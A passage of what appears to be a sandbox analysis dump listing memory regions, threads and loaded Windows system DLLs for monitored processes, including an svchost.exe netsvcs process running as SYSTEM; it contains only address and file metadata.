filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 2026
start_va = 0x1c80000
end_va = 0x1cfffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001c80000"
filename = ""
Region:
id = 2027
start_va = 0x1e30000
end_va = 0x1eaffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001e30000"
filename = ""
Region:
id = 2028
start_va = 0x7fef50d0000
end_va = 0x7fef50defff
entry_point = 0x7fef50d11d0
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 2029
start_va = 0x7fef5240000
end_va = 0x7fef52c5fff
entry_point = 0x7fef524ffd0
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 2030
start_va = 0x7fefd640000
end_va = 0x7fefd64efff
entry_point = 0x7fefd641010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2031
start_va = 0x7fefe550000
end_va = 0x7fefe5e8fff
entry_point = 0x7fefe551c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2032
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 2033
start_va = 0x7fefd6f0000
end_va = 0x7fefd72cfff
entry_point = 0x7fefd6f18f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 2034
start_va = 0x1d20000
end_va = 0x1d9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001d20000"
filename = ""
Region:
id = 2035
start_va = 0x1eb0000
end_va = 0x217efff
entry_point = 0x1eb0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2036
start_va = 0x7fefcd40000
end_va = 0x7fefcd86fff
entry_point = 0x7fefcd41064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2037
start_va = 0x7fefd040000
end_va = 0x7fefd056fff
entry_point = 0x7fefd0432b8
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 2038
start_va = 0x7fefd730000
end_va = 0x7fefd743fff
entry_point = 0x7fefd7310e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 2039
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Thread:
id = 110
os_tid = 0xad0
Thread:
id = 111
os_tid = 0xb10
Thread:
id = 112
os_tid = 0x5f8
Thread:
id = 158
os_tid = 0xb38
Thread:
id = 159
os_tid = 0xb34
Process:
id = "12"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x9052000"
os_pid = "0x34c"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "rpc_server"
parent_id = "11"
os_parent_pid = "0x5f4"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bd52" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 2040
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2041
start_va = 0x20000
end_va = 0x26fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2042
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2043
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2044
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2045
start_va = 0xc0000
end_va = 0xc1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 2046
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 2047
start_va = 0xe0000
end_va = 0xe0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 2048
start_va = 0xf0000
end_va = 0xf0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 2049
start_va = 0x100000
end_va = 0x1fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 2050
start_va = 0x200000
end_va = 0x200fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000200000"
filename = ""
Region:
id = 2051
start_va = 0x210000
end_va = 0x28ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 2052
start_va = 0x290000
end_va = 0x38ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 2053
start_va = 0x390000
end_va = 0x390fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 2054
start_va = 0x3a0000
end_va = 0x41ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000003a0000"
filename = ""
Region:
id = 2055
start_va = 0x420000
end_va = 0x42ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000420000"
filename = ""
Region:
id = 2056
start_va = 0x430000
end_va = 0x5b7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000430000"
filename = ""
Region:
id = 2057
start_va = 0x5c0000
end_va = 0x740fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005c0000"
filename = ""
Region:
id = 2058
start_va = 0x750000
end_va = 0x80ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000750000"
filename = ""
Region:
id = 2059
start_va = 0x810000
end_va = 0xc02fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000810000"
filename = ""
Region:
id = 2060
start_va = 0xc10000
end_va = 0xc11fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c10000"
filename = ""
Region:
id = 2061
start_va = 0xc20000
end_va = 0xc20fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c20000"
filename = ""
Region:
id = 2062
start_va = 0xc30000
end_va = 0xc31fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c30000"
filename = ""
Region:
id = 2063
start_va = 0xc40000
end_va = 0xc43fff
entry_point = 0xc40000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2064
start_va = 0xc50000
end_va = 0xccffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000c50000"
filename = ""
Region:
id = 2065
start_va = 0xcd0000
end_va = 0xcd3fff
entry_point = 0xcd0000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2066
start_va = 0xce0000
end_va = 0xce0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ce0000"
filename = ""
Region:
id = 2067
start_va = 0xcf0000
end_va = 0xd6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000cf0000"
filename = ""
Region:
id = 2068
start_va = 0xd70000
end_va = 0xd9ffff
entry_point = 0xd70000
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db")
Region:
id = 2069
start_va = 0xdb0000
end_va = 0xe2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000db0000"
filename = ""
Region:
id = 2070
start_va = 0xe30000
end_va = 0xe4bfff
entry_point = 0xe30000
region_type = mapped_file
name = "firewallapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui")
Region:
id = 2071
start_va = 0xe50000
end_va = 0xe50fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000e50000"
filename = ""
Region:
id = 2072
start_va = 0xe60000
end_va = 0xe60fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e60000"
filename = ""
Region:
id = 2073
start_va = 0xe70000
end_va = 0xe70fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000e70000"
filename = ""
Region:
id = 2074
start_va = 0xe80000
end_va = 0xe80fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000e80000"
filename = ""
Region:
id = 2075
start_va = 0xe90000
end_va = 0xf0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e90000"
filename = ""
Region:
id = 2076
start_va = 0xf10000
end_va = 0x11defff
entry_point = 0xf10000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2077
start_va = 0x11e0000
end_va = 0x1245fff
entry_point = 0x11e0000
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 2078
start_va = 0x1260000
end_va = 0x12dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001260000"
filename = ""
Region:
id = 2079
start_va = 0x1360000
end_va = 0x13dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001360000"
filename = ""
Region:
id = 2080
start_va = 0x13e0000
end_va = 0x145ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000013e0000"
filename = ""
Region:
id = 2081
start_va = 0x1490000
end_va = 0x150ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001490000"
filename = ""
Region:
id = 2082
start_va = 0x1510000
end_va = 0x158ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001510000"
filename = ""
Region:
id = 2083
start_va = 0x15c0000
end_va = 0x15cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000015c0000"
filename = ""
Region:
id = 2084
start_va = 0x1600000
end_va = 0x167ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001600000"
filename = ""
Region:
id = 2085
start_va = 0x16a0000
end_va = 0x171ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000016a0000"
filename = ""
Region:
id = 2086
start_va = 0x1740000
end_va = 0x17bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001740000"
filename = ""
Region:
id = 2087
start_va = 0x1810000
end_va = 0x181ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001810000"
filename = ""
Region:
id = 2088
start_va = 0x1830000
end_va = 0x18affff
entry_point = 0x0
region_type = private
name = "private_0x0000000001830000"
filename = ""
Region:
id = 2089
start_va = 0x18b0000
end_va = 0x192ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000018b0000"
filename = ""
Region:
id = 2090
start_va = 0x1950000
end_va = 0x19cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001950000"
filename = ""
Region:
id = 2091
start_va = 0x1a00000
end_va = 0x1a7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001a00000"
filename = ""
Region:
id = 2092
start_va = 0x1a90000
end_va = 0x1b0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001a90000"
filename = ""
Region:
id = 2093
start_va = 0x1b10000
end_va = 0x1b8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001b10000"
filename = ""
Region:
id = 2094
start_va = 0x1b90000
end_va = 0x1c0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001b90000"
filename = ""
Region:
id = 2095
start_va = 0x1c10000
end_va = 0x1d0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001c10000"
filename = ""
Region:
id = 2096
start_va = 0x1d90000
end_va = 0x1e8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001d90000"
filename = ""
Region:
id = 2097
start_va = 0x1ea0000
end_va = 0x1f1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001ea0000"
filename = ""
Region:
id = 2098
start_va = 0x1f20000
end_va = 0x1f9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001f20000"
filename = ""
Region:
id = 2099
start_va = 0x2020000
end_va = 0x209ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002020000"
filename = ""
Region:
id = 2100
start_va = 0x20f0000
end_va = 0x216ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000020f0000"
filename = ""
Region:
id = 2101
start_va = 0x2170000
end_va = 0x24b2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002170000"
filename = ""
Region:
id = 2102
start_va = 0x2510000
end_va = 0x258ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002510000"
filename = ""
Region:
id = 2103
start_va = 0x25b0000
end_va = 0x262ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 2104
start_va = 0x2660000
end_va = 0x26dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002660000"
filename = ""
Region:
id = 2105
start_va = 0x26e0000
end_va = 0x27dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000026e0000"
filename = ""
Region:
id = 2106
start_va = 0x2800000
end_va = 0x287ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 2107
start_va = 0x2890000
end_va = 0x290ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002890000"
filename = ""
Region:
id = 2108
start_va = 0x2940000
end_va = 0x29bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002940000"
filename = ""
Region:
id = 2109
start_va = 0x2a60000
end_va = 0x2a6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a60000"
filename = ""
Region:
id = 2110
start_va = 0x2ac0000
end_va = 0x2b3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002ac0000"
filename = ""
Region:
id = 2111
start_va = 0x2bb0000
end_va = 0x2c2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002bb0000"
filename = ""
Region:
id = 2112
start_va = 0x2c40000
end_va = 0x2cbffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002c40000"
filename = ""
Region:
id = 2113
start_va = 0x2d10000
end_va = 0x2d8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002d10000"
filename = ""
Region:
id = 2114
start_va = 0x2db0000
end_va = 0x2e2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002db0000"
filename = ""
Region:
id = 2115
start_va = 0x2e50000
end_va = 0x2ecffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002e50000"
filename = ""
Region:
id = 2116
start_va = 0x2f50000
end_va = 0x2fcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f50000"
filename = ""
Region:
id = 2117
start_va = 0x2ff0000
end_va = 0x306ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002ff0000"
filename = ""
Region:
id = 2118
start_va = 0x30c0000
end_va = 0x313ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000030c0000"
filename = ""
Region:
id = 2119
start_va = 0x3140000
end_va = 0x31bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003140000"
filename = ""
Region:
id = 2120
start_va = 0x3230000
end_va = 0x32affff
entry_point = 0x0
region_type = private
name = "private_0x0000000003230000"
filename = ""
Region:
id = 2121
start_va = 0x3310000
end_va = 0x338ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003310000"
filename = ""
Region:
id = 2122
start_va = 0x33b0000
end_va = 0x342ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000033b0000"
filename = ""
Region:
id = 2123
start_va = 0x3430000
end_va = 0x352ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003430000"
filename = ""
Region:
id = 2124
start_va = 0x3590000
end_va = 0x360ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003590000"
filename = ""
Region:
id = 2125
start_va = 0x36f0000
end_va = 0x376ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000036f0000"
filename = ""
Region:
id = 2126
start_va = 0x3790000
end_va = 0x380ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003790000"
filename = ""
Region:
id = 2127
start_va = 0x3820000
end_va = 0x389ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003820000"
filename = ""
Region:
id = 2128
start_va = 0x38d0000
end_va = 0x394ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000038d0000"
filename = ""
Region:
id = 2129
start_va = 0x3a50000
end_va = 0x3c4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003a50000"
filename = ""
Region:
id = 2130
start_va = 0x3c90000
end_va = 0x3d0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003c90000"
filename = ""
Region:
id = 2131
start_va = 0x3da0000
end_va = 0x3e1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003da0000"
filename = ""
Region:
id = 2132
start_va = 0x3e60000
end_va = 0x3edffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003e60000"
filename = ""
Region:
id = 2133
start_va = 0x4080000
end_va = 0x40fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004080000"
filename = ""
Region:
id = 2134
start_va = 0x41a0000
end_va = 0x429ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000041a0000"
filename = ""
Region:
id = 2135
start_va = 0x42a0000
end_va = 0x449ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000042a0000"
filename = ""
Region:
id = 2136
start_va = 0x44a0000
end_va = 0x459ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000044a0000"
filename = ""
Region:
id = 2137
start_va = 0x45b0000
end_va = 0x462ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000045b0000"
filename = ""
Region:
id = 2138
start_va = 0x4660000
end_va = 0x46dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004660000"
filename = ""
Region:
id = 2139
start_va = 0x46f0000
end_va = 0x476ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000046f0000"
filename = ""
Region:
id = 2140
start_va = 0x47c0000
end_va = 0x483ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000047c0000"
filename = ""
Region:
id = 2141
start_va = 0x4950000
end_va = 0x49cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004950000"
filename = ""
Region:
id = 2142
start_va = 0x775e0000
end_va = 0x776d9fff
entry_point = 0x775fa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2143
start_va = 0x776e0000
end_va = 0x777fefff
entry_point = 0x776f5ea0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2144
start_va = 0x77800000
end_va = 0x779a8fff
entry_point = 0x77800000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2145
start_va = 0x779d0000
end_va = 0x779d6fff
entry_point = 0x779d106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 2146
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2147
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2148
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2149
start_va = 0xff9e0000
end_va = 0xff9eafff
entry_point = 0xff9e246c
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 2150
start_va = 0x7fede7f0000
end_va = 0x7fedea42fff
entry_point = 0x7fede7f0000
region_type = mapped_file
name = "wuaueng.dll"
filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll")
Region:
id = 2151
start_va = 0x7fee07a0000
end_va = 0x7fee0871fff
entry_point = 0x7fee07a0000
region_type = mapped_file
name = "qmgr.dll"
filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll")
Region:
id = 2152
start_va = 0x7fee12b0000
end_va = 0x7fee1529fff
entry_point = 0x7fee12b0000
region_type = mapped_file
name = "esent.dll"
filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll")
Region:
id = 2153
start_va = 0x7fef13a0000
end_va = 0x7fef13e4fff
entry_point = 0x7fef13a0000
region_type = mapped_file
name = "upnp.dll"
filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll")
Region:
id = 2154
start_va = 0x7fef1af0000
end_va = 0x7fef1b01fff
entry_point = 0x7fef1af0000
region_type = mapped_file
name = "bitsigd.dll"
filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll")
Region:
id = 2155
start_va = 0x7fef1b10000
end_va = 0x7fef1b19fff
entry_point = 0x7fef1b10000
region_type = mapped_file
name = "bitsperf.dll"
filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll")
Region:
id = 2156
start_va = 0x7fef1b20000
end_va = 0x7fef1b35fff
entry_point = 0x7fef1b20000
region_type = mapped_file
name = "ncprov.dll"
filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll")
Region:
id = 2157
start_va = 0x7fef3c70000
end_va = 0x7fef3c7bfff
entry_point = 0x7fef3c7602c
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 2158
start_va = 0x7fef3c80000
end_va = 0x7fef3c8efff
entry_point = 0x7fef3c80000
region_type = mapped_file
name = "mspatcha.dll"
filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll")
Region:
id = 2159
start_va = 0x7fef4210000
end_va = 0x7fef4280fff
entry_point = 0x7fef424ecc4
region_type = mapped_file
name = "winspool.drv"
filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv")
Region:
id = 2160
start_va = 0x7fef46c0000
end_va = 0x7fef46c8fff
entry_point = 0x7fef46c0000
region_type = mapped_file
name = "tschannel.dll"
filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll")
Region:
id = 2161
start_va = 0x7fef46d0000
end_va = 0x7fef46d7fff
entry_point = 0x7fef46d1414
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 2162
start_va = 0x7fef4750000
end_va = 0x7fef4769fff
entry_point = 0x7fef4750000
region_type = mapped_file
name = "nci.dll"
filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll")
Region:
id = 2163
start_va = 0x7fef47b0000
end_va = 0x7fef47c8fff
entry_point = 0x7fef47b0000
region_type = mapped_file
name = "resutils.dll"
filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll")
Region:
id = 2164
start_va = 0x7fef47d0000
end_va = 0x7fef481ffff
entry_point = 0x7fef47d0000
region_type = mapped_file
name = "clusapi.dll"
filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll")
Region:
id = 2165
start_va = 0x7fef4820000
end_va = 0x7fef4827fff
entry_point = 0x7fef4820000
region_type = mapped_file
name = "sscore.dll"
filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll")
Region:
id = 2166
start_va = 0x7fef48c0000
end_va = 0x7fef48e4fff
entry_point = 0x7fef48c0000
region_type = mapped_file
name = "browser.dll"
filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll")
Region:
id = 2167
start_va = 0x7fef48f0000
end_va = 0x7fef492cfff
entry_point = 0x7fef48f0000
region_type = mapped_file
name = "srvsvc.dll"
filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll")
Region:
id = 2168
start_va = 0x7fef4930000
end_va = 0x7fef49adfff
entry_point = 0x7fef4930000
region_type = mapped_file
name = "wbemess.dll"
filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll")
Region:
id = 2169
start_va = 0x7fef4c00000
end_va = 0x7fef4c15fff
entry_point = 0x7fef4c00000
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 2170
start_va = 0x7fef4c20000
end_va = 0x7fef4cdbfff
entry_point = 0x7fef4c20000
region_type = mapped_file
name = "wmiprvsd.dll"
filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll")
Region:
id = 2171
start_va = 0x7fef4ce0000
end_va = 0x7fef4d52fff
entry_point = 0x7fef4ce0000
region_type = mapped_file
name = "repdrvfs.dll"
filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll")
Region:
id = 2172
start_va = 0x7fef4d60000
end_va = 0x7fef4d85fff
entry_point = 0x7fef4d60000
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 2173
start_va = 0x7fef4d90000
end_va = 0x7fef4dd6fff
entry_point = 0x7fef4d90000
region_type = mapped_file
name = "wdscore.dll"
filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll")
Region:
id = 2174
start_va = 0x7fef4de0000
end_va = 0x7fef4e21fff
entry_point = 0x7fef4de0000
region_type = mapped_file
name = "sqmapi.dll"
filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")
Region:
id = 2175
start_va = 0x7fef4e30000
end_va = 0x7fef4ec1fff
entry_point = 0x7fef4e30000
region_type = mapped_file
name = "iphlpsvc.dll"
